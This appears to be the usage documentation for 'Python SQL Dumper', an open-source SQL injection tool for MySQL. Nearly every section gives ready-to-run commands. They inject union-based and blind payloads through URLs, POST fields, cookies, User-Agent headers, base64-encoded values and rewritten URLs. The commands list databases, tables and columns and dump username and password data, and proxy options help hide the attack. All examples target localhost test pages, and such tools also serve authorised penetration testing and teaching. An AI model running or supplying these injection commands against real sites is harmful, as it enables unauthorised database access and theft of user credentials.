Python SQL dumper

This is a open source SQL dumper written in python.

Bugs and suggestions at : tdx_ev@yahoo.com | GPG-PuK

Features:

Databases support : MySQL
Injection methods : INBAND, BLIND
Injection in all parameters sent to server GET, POST, HEADERS (Cookie, User-Agent,...)
Custom headers
Supports mod_rewrite injection
Supports injection in parameters encoded in base64 algoritm
Supports proxy (HTTP, SOCKET4, SOCKET5)
Supports injection in HTTPS throw proxy (only socket)
Supports custom user query injection
Save all extracted data to a dump file
Dumps only structure of database
Increases delay between two consecutive failed requests (allow the server to chill down)
Delay between requests

Command line options:

[+]

-u or --url

This option must be set with the HTTP address of the site. The URL can be used as injection place

Example :
How to set URL option:
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php" How to set URL option and GET parameters :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1" How to make a SQL injection into URL option :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 and false union select 1,{inject_here}&page=index" --dbs

[+]

-p or --params

List of params that will be send to the server, can be send using GET or POST method. Parameters must be in the following format: param_name=value&param_name=value GET parameters can be also send in the --url option.

Examples :
How to send GET parameters :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php" --params "page=index&id=1" --method GET How to send POST parameters :
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php" --params "page=index&id=1" --method POST How to send GET and POST parameters same time:
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php?page=index" --params "id=1" --method POST

[+]

-m or --method

This option specifies the method that it will be used to send parameters to the site.

GET
POST

Examples :
How to make a SQL injection into GET parameters (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php" --params "id=1 and false union select 1,{inject_here}&page=index" --method GET --dbs How to make a SQL injection into GET parameters and also send POST parameters:
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 and false union select 1,{inject_here}&page=index" --params "list=10&offset=1" --method POST --dbs How to make a SQL injection into POST parameters (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php" --params "id=1 and false union select 1,{inject_here}" --method POST --dbs How to make a SQL injection into POST parameters and also send GET parameters:
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php?page=usercp" --params "id=1 and false union select 1,{inject_here}" --method POST --dbs

[+]

--user-agent

This option is use to send a custom User-Agent header to the server, also it can be used as injection parameter.
For default the script send "Python SQL Dumper" string as User-Agent.

Example :
How to send a custom User-Agent header (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0.1) Gecko/20100101 Firefox/5.0.1" --dbs How to make SQL injection into a User-Agent header (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/useragent/index.php" --user-agent "' union select 1,{inject_here} -- --" --dbs

[+]

--cookie

This option is use to send a custom Cookie header to the server, also it can be used as injection parameter.
Cookie data must be send as cookie_name=cookie_value separated by semicolon example: bbsessionhash=4b555c89b39eae8546cbf3c6f63a20ba; bblastvisit=1312053111; For default the script send no cookie header.

Examples :
How to send a cookie header (cookie authentication) (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/cookie/index.php?id=1 union select 1,{inject_here}" --cookie "USER_ID=1; bbsessionhash=4b555c89b39eae8546cbf3c6f63a20ba; bblastvisit=1312053111;" --dbs How to make a SQL injection into a cookie header (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/cookie/index.php" --cookie "USER_ID=1 union select 1,{inject_here}" --dbs

[+]

--proxy

This option is used to set the proxy that the script will use to access the server.
Proxy must by in this format: username:password@ip:port or if no user name and password is needed the format will be this ip:port By default the script will not use any proxy and no warning message will be shown.
If no proxy type is specified the script will try to use HTTP proxy type.

Examples :
How to set proxy user name, password, ip and port :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --proxy "tdxev:password@127.0.0.1:1080" --dbs How to set proxy ip and port :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --proxy "127.0.0.1:1080" --dbs

[+]

--proxy-type

This option is used to specify the type of the proxy that will be used.
Proxy type must be on of the following:

HTTP
SOCKET4
SOCKET5

By default it is set to use HTTP proxy

Examples :
How to set proxy as socket5 :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --proxy "127.0.0.1:1080" --proxy-type SOCKET5

[+]

--delay

This is how long the script will wait (in seconds) before each request made to the server
By default it set zero seconds

Examples :
How to set delay between requests (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs --delay "0.5"

[+]

--injection-method

This must be set with the SQL injection method that the script will use to extract data

INBAND - the result is returned in the content of the page
BLIND - the result is not displayed in the page but the page is looking differently depending on the SQL query

By default this option is set to INBAND

Examples :
How to set INBAND SQL injection (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 and false union select 1,{inject_here}" --injection-method INBAND --dbs How to set BLIND SQL injection (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 {inject_here}" --injection-method BLIND --string "Welcome" --dbs

[+]

--string

This must be set with the string that appear in the page when a SQL condition is true

Examples :
How to set the string option for the blind SQL injection (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 {inject_here}" --injection-method BLIND --string "Welcome" --dbs

[+]

--dbs

This option is used to list all database names.

Examples :
How to extract all database names (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs

[+]

--tables

This option is used to list tables names from a database or from all databases.
The database from whitch the tables names will be extracted must be specified with -D option.

Examples :
How to extract all table names from all databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables The above command will extract all table names all databases.

How to extract all table names from multiple databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli,mysql The above command will extract all tables names from databases test_sqli and mysql.

How to extract all table names from a database (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli The above command will extract all table names from database test_sqli and mysql.

[+]

--columns

This option is used to list the names of all columns of the table(s).
Use -T option to specify the table(s) and -D option to specify the database(s).

Examples :
How to extract all column names for all tables from all databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns The above command will extract all column names for all the tables from all the databases.

How to extract all column names for all tables from multiple databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli,mysql The above command will extract all column names for all tables in the databases test_sqli and mysql.

How to extract all column names for all tables from a database (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli The above command will extract all column names for all tables in the database test_sqli

How to extract all column names for multiple tables from a database (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users,users_old The above command will extract all column names for tables users and users_old from database test.

How to extract all column names from a single table (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users The above command will extract all column names for table users from database test_sqli.

[+]

--dump

This option is use to dump column(s) data, entire table(s) or database(s).
To specify a column or multiple columns you must use -C option , -T for table(s), -D for database(s) or no option to dump all databases content.
When multiple columns are used, the names of tables or databases must be separated by comma.

Examples :
How to dump data from a single column (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C password The above command will extract all rows content of password column from table users that is in database test_sqli.

How to dump data from multiple columns (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username,password The above command will extract all rows content of username and password columns from table users that is in database test_sqli.

How to dump data from single table (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users The above command will extract all rows content of all columns from table users that is in database test_sqli.

How to dump data from multiple tables (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users,users_old The above command will extract all rows content of all columns from tables users and users_old that is in database test_sqli.

How to dump data from entire database (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli The above command will extract all rows content of all columns for all tables in database test_sqli.

How to dump data from entire databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli,mysql The above command will extract all rows content of all columns from all tables in the databases test_sqli and mysql.

How to dump data from all databases (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump The above command will extract all rows content of all columns from all tables in all databases that the user have access to.

[+]

--limit

This option can be used together with --dbs,--tables,--columns,--dump, and is used to tell the script to limit the data that will be extracted.
Sintax : --limit (start_pos),(number_of_rows_to_extract)
Sintax examples:

--limit 0,10 - will extract first 10 rows

--limit 5    - will extract all rows starting from row 5

--limit 10,5 - will extract 5 rows starting from row 10

Examples :
How to use limit with --dump option (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username,password --limit 0,10 The above command will extract the first 10 rows from username and password columns from users table from database test_sqli.

How to use limit with --dbs option (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs --limit 0,1 The above command will extract only the first database.

How to use limit with --tables option (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli --limit 2,5 The above command will extract 5 tables names starting from row 2 from database test_sqli.

How to use limit with --columns option (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users --limit 1 The above command will extract all column names starting from row 1 from table users in database test_sqli.

[+]

-D

It specifies from what database(s) will be extracted information(s).
If you use more that one database you must use comma to separate the names of databases (ex. -D "information_schema,test").

Examples :
How to set a single database that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli How to set multiple databases that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli,mysql

[+]

-T

It specifies from what table(s) will be extracted information(s).
If you use more that one table you must use comma to separate the names of tables (ex. -T "users,users_old").

Examples :
How to set a single table that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users How to set multiple tables that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users,users_old

[+]

-C

It specifies from what column(s) will be extracted information(s).
If you use more that one column you must use comma to separate the names of columns (ex. -C "username,password").

Examples :
How to set a single column that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username How to set multiple columns that will be used to extract data (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username,password

[+]

--query

This option can be used by the user to execute custom SQL query.

Examples :
How to execute custom query (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --query "select @@version"
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --query "select username from users limit 1,1"

[+]

-v

This option can be used to indicate verbose mode that will be used.

0 - no information will be displayed
1 - extracted information from data base
2 - all from 1 + SQL query that has been injected
3 - all from 2 + URL and all parameters
4 - all from 3 + server response headers
5 - all from 4 + content of the received page

Examples :
How to use verbose option (Watch video) :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs -v 2

Other options:

[+]

Encoder options can be used to encode text(base64, hex, sqlhex)

Text between {encode|TYPE}{/encode} tags will be encoded with the TYPE specifyed by user. Type can be one of the following:

base64 - text will be encoded in base64
hex - text will be encoded in hex
sqlhex - text will be encoded in hex and before the hex text it will place "0x"

For encoding data more that one time just add another encoding tag. The plain text "word" between following tags {encode|base64}{encode|hex}word{/encode}{/encode} will be encoded to : 'Nzc2ZjcyNjQ='

Example :
How to inject base64 encoded parameter :
python dump.py --url "http://127.0.0.1/test/sqli/base64/index.php?id={encode|base64}1 union select 1,{inject_here}{/encode}" --dbs

[+]

Apache mode_rewrite injection

You can make sql injection in more_rewrite URL by using the same syntax.

Example :
How to make a SQL injection in apache mode_rewrite URL:
python dump.py --url "http://127.0.0.1/test/sqli/moderewrite/user-id-1 union select 1,{inject_here}.html" --dbs

How to list :

Download : Check here for the latest Python SQL Dumper release

If you want to test this script on localhost you can download the php scripts that has been used in video tutorials.

Download: php testing platform